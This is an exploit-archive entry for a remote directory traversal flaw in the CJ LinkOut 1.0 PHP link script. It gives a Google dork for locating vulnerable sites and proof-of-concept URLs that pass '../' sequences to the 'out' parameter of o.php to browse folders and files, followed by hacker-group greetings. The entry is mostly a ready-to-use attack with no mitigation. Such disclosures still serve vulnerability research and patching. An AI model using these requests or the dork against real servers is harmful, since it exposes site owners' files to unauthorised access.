id: 18047
date: 04/12/2012
title: CJ LinkOut V1.0 <= Remote Directory Traversal Vulnerability
author: Dr.NaNo
cves: 

# Exploit Title: CJ LinkOut V1.0 <= Remote Directory Traversal Vulnerability
# Author: Dr.NaNo
# Software Link: http://www.cj-design.com/products/free-downloads/php-scripts/cjlinkout
# Version: 1.0
# Tested on: Linux-Red-Hat
# Google Dork: powered By CJ LinkOut V1.0
#
########################################################
#                       ~ P0c~                         #
########################################################
 

http://localhost/{PaTh}/NANO/o.php?out=../ <= (View Folders and Files)

http://localhost/{PaTh}/NANO/o.php?out=../../[any folder]


#### ~ Greetz ~ #########################################################
#                                                                       #
# Dr.WEP , JIKO , ahwak2000 , RENO , ABU NWAF , Dr.HAiL , snc0pe , 020  #
#                                                                       #
# JaBrOt HaCkEr , alkaseer20 , SadHaCkEr , Cyber Code , aircrack -ng    #
#                                                                       #
############################################### ~ All FriendS ~ #########



#  0day.today [2023-03-27]  #